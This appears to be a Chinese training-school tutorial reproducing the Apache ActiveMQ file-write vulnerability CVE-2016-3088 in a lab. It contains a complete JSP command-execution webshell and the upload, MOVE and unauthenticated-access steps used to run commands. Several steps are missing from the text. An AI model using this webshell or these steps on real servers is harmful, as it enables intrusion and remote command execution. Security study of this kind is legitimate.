2019-08-07 15:25:27 3575浏览
今天千锋扣丁学堂Linux培训老师给大家分享一篇关于介绍了Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现的详细介绍,下面我们一起来看一下吧。
3、启动,进入bin目录下,运行./activemqstart
4、浏览器访问http://192.168.10.149:8161/,如下图可以看到成功搭建环境
<%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); } %>
2、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图可以看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限
3、利用该版本存在物理路径泄露漏洞,爆一下绝对路径
4、利用Move方法将webshell移入admin目录下,如下图所示成功把文件移入到admin目录
5、利用该版本存在的未授权访问漏洞,不用登录,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图可以看到成功执行命令
【关注微信公众号获取更多学习资料】 【扫码进入Python全栈开发免费公开课】